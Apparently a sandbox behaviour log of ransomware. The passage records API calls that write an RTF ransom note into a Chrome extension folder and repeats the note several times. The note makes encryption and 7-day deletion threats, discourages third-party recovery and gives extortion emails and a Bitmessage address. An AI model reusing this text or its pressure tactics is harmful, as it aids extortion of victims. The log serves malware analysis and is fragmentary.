y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nLp¬\x9d}67È\x90U«Ôg^úò\x1f$kZ\x02Ã`\x03^", lpUsedDefaultChar=0x0) returned 8717 [0289.666] WriteFile (in: hFile=0x2f0, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.667] CloseHandle (hObject=0x2f0) returned 1 [0289.667] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#readme_eman#.rtf")) returned 0xffffffff [0289.667] GetLastError () returned 0x2 [0289.667] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0289.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 